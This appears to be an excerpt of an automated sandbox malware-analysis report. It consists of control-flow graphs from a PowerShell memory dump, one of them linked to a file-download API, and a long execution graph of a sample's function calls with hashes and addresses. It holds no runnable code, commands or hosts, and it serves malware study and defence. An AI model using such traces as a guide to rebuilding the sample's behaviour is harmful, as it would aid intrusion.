                                                                                                • Snapshot File: hcaresult_6_2_7fe899b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DownloadFile
                                                                                                • String ID:
                                                                                                • API String ID: 1407266417-0
                                                                                                • Opcode ID: eccb5d4efdd9d821339d51415183fc3a6ca4cb2d8cb12961b40f8134c3fb33e0
                                                                                                • Instruction ID: 777315a8379273862214977f4159bba84b37a095e6150f6c079ad4062ad424ff
                                                                                                • Opcode Fuzzy Hash: eccb5d4efdd9d821339d51415183fc3a6ca4cb2d8cb12961b40f8134c3fb33e0
                                                                                                • Instruction Fuzzy Hash: BB41F37181DB989FDB19EB589C447A9BBF0FB56321F04826FD08DD3162CB286806C782

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 26 7fe89a82cd9-7fe89a82d18 27 7fe89a82d1b-7fe89a82d4b 26->27 28 7fe89a82d50-7fe89a82d89 26->28 27->28 29 7fe89a8326d-7fe89a83326 28->29 30 7fe89a82d8f-7fe89a82d99 28->30 31 7fe89a82d9b-7fe89a82da8 30->31 32 7fe89a82db2-7fe89a82db9 30->32 31->32 33 7fe89a82daa-7fe89a82db0 31->33 34 7fe89a82dbb-7fe89a82dce 32->34 35 7fe89a82dd0 32->35 33->32 37 7fe89a82dd2-7fe89a82dd4 34->37 35->37 40 7fe89a831e8-7fe89a831f2 37->40 41 7fe89a82dda-7fe89a82de6 37->41 42 7fe89a83205-7fe89a83215 40->42 43 7fe89a831f4-7fe89a83204 40->43 41->29 44 7fe89a82dec-7fe89a82df6 41->44 46 7fe89a83217-7fe89a8321b 42->46 47 7fe89a83222-7fe89a8326c 42->47 48 7fe89a82df8-7fe89a82e05 44->48 49 7fe89a82e12-7fe89a82e22 44->49 46->47 48->49 50 7fe89a82e07-7fe89a82e10 48->50 49->40 54 7fe89a82e28-7fe89a82e5c 49->54 50->49 54->40 60 7fe89a82e62-7fe89a82e6e 54->60 60->29 61 7fe89a82e74-7fe89a82e7e 60->61 62 7fe89a82e97-7fe89a82e9c 61->62 63 7fe89a82e80-7fe89a82e8d 61->63 62->40 65 7fe89a82ea2-7fe89a82ea7 62->65 63->62 64 7fe89a82e8f-7fe89a82e95 63->64 64->62 65->40 66 7fe89a82ead-7fe89a82eb2 65->66 66->40 67 7fe89a82eb8-7fe89a82ec7 66->67 69 7fe89a82ed7 67->69 70 7fe89a82ec9-7fe89a82ed3 67->70 73 7fe89a82edc-7fe89a82ee9 69->73 71 7fe89a82ef3-7fe89a82f7e 70->71 72 7fe89a82ed5 70->72 80 7fe89a82f80-7fe89a82f8b 71->80 81 7fe89a82f92-7fe89a82fb4 71->81 72->73 73->71 74 7fe89a82eeb-7fe89a82ef1 73->74 74->71 80->81 82 7fe89a82fb6-7fe89a82fc0 81->82 83 7fe89a82fc4 81->83 84 7fe89a82fe0-7fe89a8306e 82->84 85 7fe89a82fc2 82->85 86 7fe89a82fc9-7fe89a82fd6 83->86 93 7fe89a83070-7fe89a8307b 84->93 94 7fe89a83082-7fe89a830a0 84->94 85->86 86->84 87 7fe89a82fd8-7fe89a82fde 86->87 87->84 93->94 95 7fe89a830b0 94->95 96 7fe89a830a2-7fe89a830ac 94->96 99 7fe89a830b5-7fe89a830c3 95->99 97 7fe89a830cd-7fe89a8315d 96->97 98 7fe89a830ae 96->98 106 7fe89a8315f-7fe89a8316a 97->106 107 7fe89a83171-7fe89a831ca 97->107 98->99 99->97 101 7fe89a830c5-7fe89a830cb 99->101 101->97 106->107 110 7fe89a831d2-7fe89a831e7 107->110
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.457649059.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7fe89a80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9181fc450dd1d9f3f54f43a147fc2459dd250c0546bd44c3cf6bf6d8d9fdad0e
                                                                                                • Instruction ID: cb0a7b1428736da19d699caaa54c50ccbca690ac3900cb0b11f7ced65c8c1076
                                                                                                • Opcode Fuzzy Hash: 9181fc450dd1d9f3f54f43a147fc2459dd250c0546bd44c3cf6bf6d8d9fdad0e
                                                                                                • Instruction Fuzzy Hash: 3A22E33090CB894FE799EB2C84506797FE2FF9A344F2401EAD48ED72A3DA25AC55C741

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 111 7fe89a80f62-7fe89a80f96 112 7fe89a81098-7fe89a810dc 111->112 113 7fe89a80f9c-7fe89a80fa6 111->113 121 7fe89a810ed-7fe89a8111f 112->121 122 7fe89a810de-7fe89a810e9 112->122 114 7fe89a80fa8-7fe89a80fb5 113->114 115 7fe89a80fbf-7fe89a80fee 113->115 114->115 116 7fe89a80fb7-7fe89a80fbd 114->116 115->112 126 7fe89a80ff4-7fe89a80ffe 115->126 116->115 125 7fe89a81120-7fe89a81124 121->125 124 7fe89a810eb 122->124 122->125 124->121 127 7fe89a8112a-7fe89a8119e 125->127 128 7fe89a811c1-7fe89a811cb 125->128 129 7fe89a81017-7fe89a81077 126->129 130 7fe89a81000-7fe89a8100d 126->130 146 7fe89a811a6-7fe89a811be 127->146 131 7fe89a811d8-7fe89a811e8 128->131 132 7fe89a811cd-7fe89a811d7 128->132 142 7fe89a81079-7fe89a81084 129->142 143 7fe89a8108b-7fe89a81097 129->143 130->129 133 7fe89a8100f-7fe89a81015 130->133 134 7fe89a811ea-7fe89a811ee 131->134 135 7fe89a811f5-7fe89a8121a 131->135 133->129 134->135 142->143 146->128
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.457649059.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7fe89a80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57e51087b5e6d19270a37c3ce3b1baf690697605a1ee9a9ed084576d8149c87b
                                                                                                • Instruction ID: 2de710cf67d9c3487ce82f2aa8be1ee72a32694f73af03a704a46d2fb9d72646
                                                                                                • Opcode Fuzzy Hash: 57e51087b5e6d19270a37c3ce3b1baf690697605a1ee9a9ed084576d8149c87b
                                                                                                • Instruction Fuzzy Hash: 4291F220A1DBC90FE357933C58642657FE2EF5B254B2900EBC48EDB1A3DA189C5AC351

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 307 7fe89a81e3d-7fe89a81e80 308 7fe89a81eb8-7fe89a81ec7 307->308 309 7fe89a81e83-7fe89a81eb7 307->309 310 7fe89a81fda-7fe89a82085 308->310 311 7fe89a81ecd-7fe89a81ed7 308->311 309->308 344 7fe89a82087 310->344 345 7fe89a82088-7fe89a82099 310->345 312 7fe89a81ed9-7fe89a81ee6 311->312 313 7fe89a81ef3-7fe89a81f00 311->313 312->313 315 7fe89a81ee8-7fe89a81ef1 312->315 319 7fe89a81f7b-7fe89a81f85 313->319 320 7fe89a81f02-7fe89a81f05 313->320 315->313 322 7fe89a81f87-7fe89a81f93 319->322 323 7fe89a81f94-7fe89a81fa4 319->323 320->319 321 7fe89a81f07-7fe89a81f0f 320->321 321->310 325 7fe89a81f15-7fe89a81f1f 321->325 326 7fe89a81fa6-7fe89a81faa 323->326 327 7fe89a81fb1-7fe89a81fd7 323->327 328 7fe89a81f38-7fe89a81f3c 325->328 329 7fe89a81f21-7fe89a81f2e 325->329 326->327 327->310 328->319 332 7fe89a81f3e-7fe89a81f41 328->332 329->328 331 7fe89a81f30-7fe89a81f36 329->331 331->328 332->319 334 7fe89a81f43-7fe89a81f54 332->334 338 7fe89a81f56-7fe89a81f63 334->338 339 7fe89a81f6d-7fe89a81f7a 334->339 338->339 341 7fe89a81f65-7fe89a81f6b 338->341 341->339 344->345 346 7fe89a8209b 345->346 347 7fe89a8209c-7fe89a820e1 345->347 346->347 348 7fe89a82118-7fe89a82124 347->348 349 7fe89a820e3-7fe89a82117 347->349 350 7fe89a8212a-7fe89a82134 348->350 351 7fe89a8225d-7fe89a82309 348->351 349->348 352 7fe89a82136-7fe89a82143 350->352 353 7fe89a8214d-7fe89a82152 350->353 385 7fe89a8230b 351->385 386 7fe89a8230c-7fe89a8231d 351->386 352->353 354 7fe89a82145-7fe89a8214b 352->354 355 7fe89a82158-7fe89a8215b 353->355 356 7fe89a821fe-7fe89a82208 353->356 354->353 360 7fe89a8215d-7fe89a82170 355->360 361 7fe89a82172 355->361 358 7fe89a82217-7fe89a82227 356->358 359 7fe89a8220a-7fe89a82216 356->359 362 7fe89a82229-7fe89a8222d 358->362 363 7fe89a82234-7fe89a8225a 358->363 365 7fe89a82174-7fe89a82176 360->365 361->365 362->363 363->351 365->356 367 7fe89a8217c-7fe89a8217f 365->367 369 7fe89a821a6 367->369 370 7fe89a82181-7fe89a821a4 367->370 372 7fe89a821a8-7fe89a821aa 369->372 370->372 372->356 375 7fe89a821ac-7fe89a821d7 372->375 381 7fe89a821d9-7fe89a821e6 375->381 382 7fe89a821f0-7fe89a821fd 375->382 381->382 384 7fe89a821e8-7fe89a821ee 381->384 384->382 385->386 387 7fe89a8231f 386->387 388 7fe89a82320-7fe89a82341 386->388 387->388
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.457649059.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7fe89a80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 01b2eb0a22f44f96154a1b6671dedf6ad8dc31d0988c5687c6fde187a28c1fa4
                                                                                                • Instruction ID: c1c1283434fe51ddb164ecf0dee03d28af91562a7e6ea44ba4fd70f782db15ce
                                                                                                • Opcode Fuzzy Hash: 01b2eb0a22f44f96154a1b6671dedf6ad8dc31d0988c5687c6fde187a28c1fa4
                                                                                                • Instruction Fuzzy Hash: E7025120A1DBC90FE756A73858243B97FE0EF5A254F1801EBD49DD71A3DA18AC19C391

                                                                                                Execution Graph

                                                                                                Execution Coverage:32.4%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:4.5%
                                                                                                Total number of Nodes:1845
                                                                                                Total number of Limit Nodes:99
                                                                                                execution_graph 9717 40c640 9718 404bee 7 API calls 9717->9718 9719 40c656 9718->9719 9720 40c70f 9719->9720 9721 404bee 7 API calls 9719->9721 9722 40c66b 9721->9722 9723 40c708 9722->9723 9725 404bee 7 API calls 9722->9725 9724 402bab 2 API calls 9723->9724 9724->9720 9726 40c683 9725->9726 9728 404bee 7 API calls 9726->9728 9731 40c701 9726->9731 9727 402bab 2 API calls 9727->9723 9729 40c694 9728->9729 9738 40c6f8 9729->9738 9744 40c522 9729->9744 9730 402bab 2 API calls 9730->9731 9731->9727 9733 40c6a9 9734 40c6ef 9733->9734 9735 405872 4 API calls 9733->9735 9736 402bab 2 API calls 9734->9736 9737 40c6c5 9735->9737 9736->9738 9739 405872 4 API calls 9737->9739 9738->9730 9740 40c6d5 9739->9740 9741 405872 4 API calls 9740->9741 9742 40c6e7 9741->9742 9743 402bab 2 API calls 9742->9743 9743->9734 9745 402b7c 2 API calls 9744->9745 9746 40c542 9745->9746 9746->9733 8362 409046 8375 413b28 8362->8375 8364 40906d 8366 405b6f 6 API calls 8364->8366 8365 40904e 8365->8364 8367 403fbf 7 API calls 8365->8367 8368 40907c 8366->8368 8367->8364 8369 409092 8368->8369 8379 409408 8368->8379 8371 4090a3 8369->8371 8374 402bab 2 API calls 8369->8374 8373 402bab 2 API calls 8373->8369 8374->8371 8376 413b31 8375->8376 8377 413b38 8375->8377 8378 404056 7 API calls 8376->8378 8377->8365 8378->8377 8380 409413 8379->8380 8381 40908c 8380->8381 8393 409d36 8380->8393 8381->8373 8392 40945c 8499 40a35d 8392->8499 8394 409d43 8393->8394 8395 40a35d 5 API calls 8394->8395 8396 409d55 8395->8396 8397 4031e5 4 API calls 8396->8397 8398 409d8b 8397->8398 8399 4031e5 4 API calls 8398->8399 8400 409dd0 8399->8400 8401 405b6f 6 API calls 8400->8401 8424 409423 8400->8424 8404 409df7 8401->8404 8402 409e1c 8403 4031e5 4 API calls 8402->8403 8402->8424 8405 409e62 8403->8405 8404->8402 8406 402bab 2 API calls 8404->8406 8407 4031e5 4 API calls 8405->8407 8406->8402 8408 409e82 8407->8408 8409 4031e5 4 API calls 8408->8409 8410 409ea2 8409->8410 8411 4031e5 4 API calls 8410->8411 8412 409ec2 8411->8412 8413 4031e5 4 API calls 8412->8413 8414 409ee2 8413->8414 8415 4031e5 4 API calls 8414->8415 8416 409f02 8415->8416 8417 4031e5 4 API calls 8416->8417 8418 409f22 8417->8418 8419 4031e5 4 API calls 8418->8419 8420 409f42 8419->8420 8421 40a19b 8420->8421 8423 409fa3 8420->8423 8422 408b2c 5 API calls 8421->8422 8422->8424 8423->8424 8425 405b6f 6 API calls 8423->8425 8424->8392 8455 4056bf 8424->8455 8426 409fbd 8425->8426 8427 40a02c 8426->8427 8429 402bab 2 API calls 8426->8429 8428 40a16d 8427->8428 8430 4031e5 4 API calls 8427->8430 8428->8424 8431 402bab 2 API calls 8428->8431 8432 409fd7 8429->8432 8433 40a070 8430->8433 8431->8424 8434 405b6f 6 API calls 8432->8434 8435 4031e5 4 API calls 8433->8435 8437 409fe5 8434->8437 8436 40a090 8435->8436 8438 4031e5 4 API calls 8436->8438 8437->8427 8439 402bab 2 API calls 8437->8439 8440 40a0b0 8438->8440 8441 409fff 8439->8441 8444 4031e5 4 API calls 8440->8444 8442 405b6f 6 API calls 8441->8442 8443 40a00d 8442->8443 8443->8427 8446 40a021 8443->8446 8445 40a0d0 8444->8445 8448 4031e5 4 API calls 8445->8448 8447 402bab 2 API calls 8446->8447 8447->8424 8449 40a0f0 8448->8449 8450 4031e5 4 API calls 8449->8450 8451 40a110 8450->8451 8452 40a134 8451->8452 8453 4031e5 4 API calls 8451->8453 8452->8428 8509 408b2c 8452->8509 8453->8452 8456 402b7c 2 API calls 8455->8456 8458 4056cd 8456->8458 8457 4056d4 8460 408c4d 8457->8460 8458->8457 8459 402b7c 2 API calls 8458->8459 8459->8457 8461 413ba4 7 API calls 8460->8461 8462 408c5c 8461->8462 8463 408f02 8462->8463 8464 408f3a 8462->8464 8467 40903e 8462->8467 8465 405b6f 6 API calls 8463->8465 8466 405b6f 6 API calls 8464->8466 8468 408f0c 8465->8468 8481 408f51 8466->8481 8483 413aca 8467->8483 8468->8467 8469 40a1b6 15 API calls 8468->8469 8471 408f31 8468->8471 8469->8471 8470 402bab 2 API calls 8470->8467 8471->8470 8472 405b6f 6 API calls 8472->8481 8474 409031 8475 402bab 2 API calls 8474->8475 8475->8471 8476 409022 8477 402bab 2 API calls 8476->8477 8478 409028 8477->8478 8479 402bab 2 API calls 8478->8479 8479->8471 8480 402bab GetProcessHeap HeapFree 8480->8481 8481->8467 8481->8471 8481->8472 8481->8474 8481->8476 8481->8480 8512 4044ee 8481->8512 8522 40a1b6 8481->8522 8484 413ad7 8483->8484 8492 409451 8483->8492 8485 405781 4 API calls 8484->8485 8486 413af0 8485->8486 8487 405781 4 API calls 8486->8487 8488 413afe 8487->8488 8489 405762 4 API calls 8488->8489 8490 413b0e 8489->8490 8491 405781 4 API calls 8490->8491 8490->8492 8491->8492 8493 405695 8492->8493 8494 4056b9 8493->8494 8495 4056a0 8493->8495 8494->8392 8496 402bab 2 API calls 8495->8496 8497 4056b3 8496->8497 8498 402bab 2 API calls 8497->8498 8498->8494 8500 40a368 8499->8500 8501 40a39a 8499->8501 8507 4031e5 4 API calls 8500->8507 8502 40a3af 8501->8502 8503 4031e5 4 API calls 8501->8503 8504 408b2c 5 API calls 8502->8504 8506 40a3ca 8502->8506 8503->8502 8504->8506 8505 40a38a 8505->8381 8506->8505 8508 408b2c 5 API calls 8506->8508 8507->8505 8508->8505 8510 4031e5 4 API calls 8509->8510 8511 408b3e FreeLibrary 8510->8511 8511->8428 8513 402b7c 2 API calls 8512->8513 8514 404512 8513->8514 8516 404585 GetLastError 8514->8516 8517 402bab 2 API calls 8514->8517 8520 402b7c 2 API calls 8514->8520 8521 40457c 8514->8521 8556 4044a7 8514->8556 8518 404592 8516->8518 8516->8521 8517->8514 8519 402bab 2 API calls 8518->8519 8519->8521 8520->8514 8521->8481 8523 40a202 8522->8523 8524 40a1c3 8522->8524 8559 405f08 8523->8559 8525 405b6f 6 API calls 8524->8525 8527 40a1d0 8525->8527 8533 40a1f3 8527->8533 8534 40a1fc 8527->8534 8566 40a45b 8527->8566 8528 402bab 2 API calls 8528->8534 8530 402bab 2 API calls 8530->8534 8532 405b6f 6 API calls 8536 40a245 8532->8536 8533->8530 8534->8481 8535 40a25d 8537 405b6f 6 API calls 8535->8537 8536->8535 8538 413a58 14 API calls 8536->8538 8543 40a26b 8537->8543 8540 40a257 8538->8540 8539 40a28b 8541 405b6f 6 API calls 8539->8541 8542 402bab 2 API calls 8540->8542 8548 40a297 8541->8548 8542->8535 8543->8539 8544 40a284 8543->8544 8678 40955b 8543->8678 8546 402bab 2 API calls 8544->8546 8546->8539 8547 405b6f 6 API calls 8553 40a2b7 8547->8553 8549 40a2b0 8548->8549 8548->8553 8685 40968e 8548->8685 8551 402bab 2 API calls 8549->8551 8551->8553 8552 40a333 8552->8528 8553->8547 8553->8552 8554 402bab 2 API calls 8553->8554 8695 4098a7 8553->8695 8554->8553 8557 4031e5 4 API calls 8556->8557 8558 4044b9 GetPrivateProfileStringW 8557->8558 8558->8514 8560 4031e5 4 API calls 8559->8560 8561 405f1d 8560->8561 8562 402b7c 2 API calls 8561->8562 8565 405f55 8561->8565 8563 405f36 8562->8563 8564 4031e5 4 API calls 8563->8564 8563->8565 8564->8565 8565->8532 8565->8534 8565->8535 8565->8552 8704 40642c 8566->8704 8568 40a469 8569 40c4ff 8568->8569 8707 4047e6 8568->8707 8569->8533 8572 4040bb 13 API calls 8573 40bf88 8572->8573 8573->8569 8574 403c90 9 API calls 8573->8574 8575 40bfaa 8574->8575 8576 402b7c 2 API calls 8575->8576 8578 40bfc1 8576->8578 8577 40c4f3 8579 403f9e 5 API calls 8577->8579 8580 40c3aa 8578->8580 8714 40a423 8578->8714 8579->8569 8580->8577 8583 4056bf 2 API calls 8580->8583 8587 40c4e3 8580->8587 8581 402bab 2 API calls 8581->8577 8585 40c3d2 8583->8585 8585->8587 8589 4040bb 13 API calls 8585->8589 8586 405f08 4 API calls 8588 40c005 8586->8588 8587->8581 8590 40c021 8588->8590 8717 40a43f 8588->8717 8591 40c3f3 8589->8591 8593 4031e5 4 API calls 8590->8593 8594 40c4d1 8591->8594 8774 405a52 8591->8774 8598 40c034 8593->8598 8597 413aca 4 API calls 8594->8597 8601 40c4dd 8597->8601 8604 4031e5 4 API calls 8598->8604 8599 40c411 8779 405a87 8599->8779 8600 402bab 2 API calls 8600->8590 8603 405695 2 API calls 8601->8603 8603->8587 8610 40c04d 8604->8610 8605 40c4b3 8606 402bab 2 API calls 8605->8606 8608 40c4cb 8606->8608 8607 405a52 4 API calls 8618 40c423 8607->8618 8609 403f9e 5 API calls 8608->8609 8609->8594 8612 4031e5 4 API calls 8610->8612 8611 405a87 4 API calls 8611->8618 8613 40c085 8612->8613 8614 4031e5 4 API calls 8613->8614 8616 40c09c 8614->8616 8615 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8615->8618 8619 4031e5 4 API calls 8616->8619 8617 402bab 2 API calls 8617->8618 8618->8605 8618->8607 8618->8611 8618->8615 8618->8617 8620 40c0b3 8619->8620 8621 4031e5 4 API calls 8620->8621 8622 40c0ca 8621->8622 8623 4031e5 4 API calls 8622->8623 8624 40c0e7 8623->8624 8625 4031e5 4 API calls 8624->8625 8626 40c100 8625->8626 8627 4031e5 4 API calls 8626->8627 8628 40c119 8627->8628 8629 4031e5 4 API calls 8628->8629 8630 40c132 8629->8630 8631 4031e5 4 API calls 8630->8631 8632 40c14b 8631->8632 8633 4031e5 4 API calls 8632->8633 8634 40c164 8633->8634 8635 4031e5 4 API calls 8634->8635 8636 40c17d 8635->8636 8637 4031e5 4 API calls 8636->8637 8638 40c196 8637->8638 8639 4031e5 4 API calls 8638->8639 8640 40c1af 8639->8640 8641 4031e5 4 API calls 8640->8641 8642 40c1c8 8641->8642 8643 4031e5 4 API calls 8642->8643 8644 40c1de 8643->8644 8645 4031e5 4 API calls 8644->8645 8646 40c1f4 8645->8646 8647 4031e5 4 API calls 8646->8647 8648 40c20d 8647->8648 8649 4031e5 4 API calls 8648->8649 8650 40c226 8649->8650 8651 4031e5 4 API calls 8650->8651 8652 40c23f 8651->8652 8653 4031e5 4 API calls 8652->8653 8654 40c258 8653->8654 8655 4031e5 4 API calls 8654->8655 8656 40c273 8655->8656 8657 4031e5 4 API calls 8656->8657 8658 40c28a 8657->8658 8659 4031e5 4 API calls 8658->8659 8662 40c2d5 8659->8662 8660 40c3a2 8661 402bab 2 API calls 8660->8661 8661->8580 8662->8660 8663 4031e5 4 API calls 8662->8663 8664 40c315 8663->8664 8665 40c38b 8664->8665 8720 404866 8664->8720 8667 403c40 5 API calls 8665->8667 8669 40c397 8667->8669 8670 403c40 5 API calls 8669->8670 8670->8660 8671 40c382 8673 403c40 5 API calls 8671->8673 8673->8665 8675 406c4c 6 API calls 8676 40c355 8675->8676 8676->8671 8744 4126a7 8676->8744 8679 409673 8678->8679 8684 40956d 8678->8684 8679->8544 8680 408b45 6 API calls 8680->8684 8681 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8681->8684 8682 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8682->8684 8683 402bab GetProcessHeap HeapFree 8683->8684 8684->8679 8684->8680 8684->8681 8684->8682 8684->8683 8686 4040bb 13 API calls 8685->8686 8687 4096a9 8686->8687 8688 40989f 8687->8688 8690 409896 8687->8690 8692 408b45 6 API calls 8687->8692 8693 402bab GetProcessHeap HeapFree 8687->8693 8694 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8687->8694 8943 4059d8 8687->8943 8688->8549 8689 403f9e 5 API calls 8689->8688 8690->8689 8692->8687 8693->8687 8694->8687 8696 4040bb 13 API calls 8695->8696 8703 4098c1 8696->8703 8697 4099fb 8697->8553 8698 4099f3 8699 403f9e 5 API calls 8698->8699 8699->8697 8700 402bab GetProcessHeap HeapFree 8700->8703 8701 4059d8 4 API calls 8701->8703 8702 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8702->8703 8703->8697 8703->8698 8703->8700 8703->8701 8703->8702 8705 4031e5 4 API calls 8704->8705 8706 406441 GetNativeSystemInfo 8705->8706 8706->8568 8708 4031e5 4 API calls 8707->8708 8709 40480a 8708->8709 8710 4031e5 4 API calls 8709->8710 8711 40484f 8709->8711 8713 40485d 8709->8713 8710->8709 8712 403c40 5 API calls 8711->8712 8712->8713 8713->8569 8713->8572 8715 4031e5 4 API calls 8714->8715 8716 40a435 8715->8716 8716->8586 8718 4031e5 4 API calls 8717->8718 8719 40a451 8718->8719 8719->8600 8721 4031e5 4 API calls 8720->8721 8722 40487c 8721->8722 8722->8671 8723 406c4c 8722->8723 8784 4068eb 8723->8784 8725 406e02 8725->8675 8726 406cab 8796 40469b 8726->8796 8727 406c6c 8727->8725 8727->8726 8793 406894 8727->8793 8734 406df1 8735 40469b 4 API calls 8734->8735 8735->8725 8736 406cef 8736->8734 8737 4031e5 4 API calls 8736->8737 8738 406d26 8737->8738 8738->8734 8739 40771e 6 API calls 8738->8739 8743 406d57 8739->8743 8740 406da2 8741 4031e5 4 API calls 8740->8741 8741->8734 8743->8740 8809 4068b0 8743->8809 8745 4126bb 8744->8745 8749 4126d1 8744->8749 8754 412840 8745->8754 8865 40488c 8745->8865 8749->8754 8871 407055 8749->8871 8750 412837 8752 403c40 5 API calls 8750->8752 8752->8754 8754->8671 8755 41281e 8756 4070ff 6 API calls 8755->8756 8756->8750 8757 407055 6 API calls 8758 412742 8757->8758 8758->8755 8759 40719a 6 API calls 8758->8759 8760 41276e 8759->8760 8761 412804 8760->8761 8887 406f4a 8760->8887 8915 4070ff 8761->8915 8764 41279a 8893 412553 8764->8893 8937 405907 8774->8937 8776 405a61 8777 405a76 8776->8777 8778 405907 4 API calls 8776->8778 8777->8599 8778->8776 8780 402b7c 2 API calls 8779->8780 8781 405a99 8780->8781 8782 405ade 8781->8782 8940 40595e 8781->8940 8782->8618 8812 4076a8 8784->8812 8786 406913 8787 406a61 8786->8787 8788 40771e 6 API calls 8786->8788 8787->8727 8792 406949 8788->8792 8789 40771e 6 API calls 8789->8792 8790 404678 4 API calls 8790->8792 8792->8787 8792->8789 8792->8790 8818 4046c2 8792->8818 8794 4031e5 4 API calls 8793->8794 8795 4068a6 8794->8795 8795->8727 8797 4046b4 8796->8797 8798 4046a4 8796->8798 8797->8725 8800 404678 8797->8800 8799 4031e5 4 API calls 8798->8799 8799->8797 8801 4031e5 4 API calls 8800->8801 8802 40468b 8801->8802 8802->8725 8803 40771e 8802->8803 8804 407737 8803->8804 8806 407748 8803->8806 8805 407644 6 API calls 8804->8805 8807 407741 8805->8807 8806->8736 8808 406baa 6 API calls 8807->8808 8808->8806 8810 4031e5 4 API calls 8809->8810 8811 4068c2 8810->8811 8811->8743 8813 4076c1 8812->8813 8817 4076d2 8812->8817 8826 407644 8813->8826 8817->8786 8819 4046d3 8818->8819 8820 4046d9 8818->8820 8861 40464c 8819->8861 8821 4046e9 8820->8821 8823 404678 4 API calls 8820->8823 8824 404714 8821->8824 8825 40469b 4 API calls 8821->8825 8823->8821 8824->8792 8825->8824 8827 407653 8826->8827 8828 407661 8826->8828 8827->8828 8834 406a6b 8827->8834 8830 406baa 8828->8830 8831 406bbb 8830->8831 8833 406bc8 8830->8833 8831->8833 8842 407402 8831->8842 8833->8817 8835 406a81 8834->8835 8836 402b7c 2 API calls 8835->8836 8837 406b8b 8835->8837 8838 406894 4 API calls 8835->8838 8839 406b96 8835->8839 8841 402bab 2 API calls 8835->8841 8836->8835 8837->8828 8838->8835 8840 402bab 2 API calls 8839->8840 8840->8837 8841->8835 8843 407644 6 API calls 8842->8843 8844 407412 8843->8844 8845 402b7c 2 API calls 8844->8845 8852 407450 8844->8852 8846 407483 8845->8846 8847 402b7c 2 API calls 8846->8847 8846->8852 8849 4074ce 8847->8849 8848 4074da 8850 4068cc 2 API calls 8848->8850 8849->8848 8851 402b7c 2 API calls 8849->8851 8850->8852 8855 40751f 8851->8855 8852->8833 8853 40752b 8854 4068cc 2 API calls 8853->8854 8854->8848 8855->8853 8857 4068cc 8855->8857 8858 4068d6 8857->8858 8859 4068e3 8857->8859 8858->8859 8860 402bab GetProcessHeap HeapFree 8858->8860 8859->8853 8860->8859 8862 404666 8861->8862 8863 404659 8861->8863 8862->8820 8864 4031e5 4 API calls 8863->8864 8864->8862 8866 4047e6 5 API calls 8865->8866 8867 404897 8866->8867 8868 40489c 8867->8868 8923 4047c7 8867->8923 8868->8749 8872 40706f 8871->8872 8873 407084 8871->8873 8872->8873 8874 407644 6 API calls 8872->8874 8878 4070e4 8873->8878 8926 406fd2 8873->8926 8875 40707d 8874->8875 8877 406baa 6 API calls 8875->8877 8877->8873 8878->8750 8879 40719a 8878->8879 8880 4071b0 8879->8880 8883 4071c5 8879->8883 8881 407644 6 API calls 8880->8881 8880->8883 8882 4071be 8881->8882 8884 406baa 6 API calls 8882->8884 8885 406fd2 4 API calls 8883->8885 8886 407226 8883->8886 8884->8883 8885->8886 8886->8755 8886->8757 8888 406f64 8887->8888 8892 406f75 8887->8892 8889 407644 6 API calls 8888->8889 8890 406f6e 8889->8890 8891 406baa 6 API calls 8890->8891 8891->8892 8892->8764 8934 4060ac 8893->8934 8916 407116 8915->8916 8918 40712b 8915->8918 8917 407644 6 API calls 8916->8917 8916->8918 8919 407124 8917->8919 8920 406fd2 4 API calls 8918->8920 8922 407187 8918->8922 8921 406baa 6 API calls 8919->8921 8920->8922 8921->8918 8922->8755 8924 4031e5 4 API calls 8923->8924 8925 4047d9 8924->8925 8925->8749 8927 406fde 8926->8927 8928 407027 8927->8928 8929 4031e5 4 API calls 8927->8929 8928->8878 8930 406ffa 8929->8930 8931 4031e5 4 API calls 8930->8931 8932 407011 8931->8932 8933 4031e5 4 API calls 8932->8933 8933->8928 8935 4031e5 4 API calls 8934->8935 8936 4060bb 8935->8936 8936->8936 8938 4031e5 4 API calls 8937->8938 8939 40591a 8938->8939 8939->8776 8941 4031e5 4 API calls 8940->8941 8942 405971 8941->8942 8942->8781 8944 4031e5 4 API calls 8943->8944 8945 4059ed 8944->8945 8946 402b7c 2 API calls 8945->8946 8949 405a38 8945->8949 8947 405a16 8946->8947 8948 4031e5 4 API calls 8947->8948 8947->8949 8948->8949 8949->8687 9811 40a349 9812 4098a7 14 API calls 9811->9812 9813 40a359 9812->9813 9028 408952 9049 40823f 9028->9049 9031 408960 9033 4056bf 2 API calls 9031->9033 9034 40896a 9033->9034 9077 408862 9034->9077 9036 413aca 4 API calls 9038 4089d4 9036->9038 9037 408975 9046 4089c4 9037->9046 9085 4087d6 9037->9085 9039 405695 2 API calls 9038->9039 9041 4089df 9039->9041 9046->9036 9047 402bab 2 API calls 9048 40899d 9047->9048 9048->9046 9048->9047 9050 40824d 9049->9050 9051 40831b 9050->9051 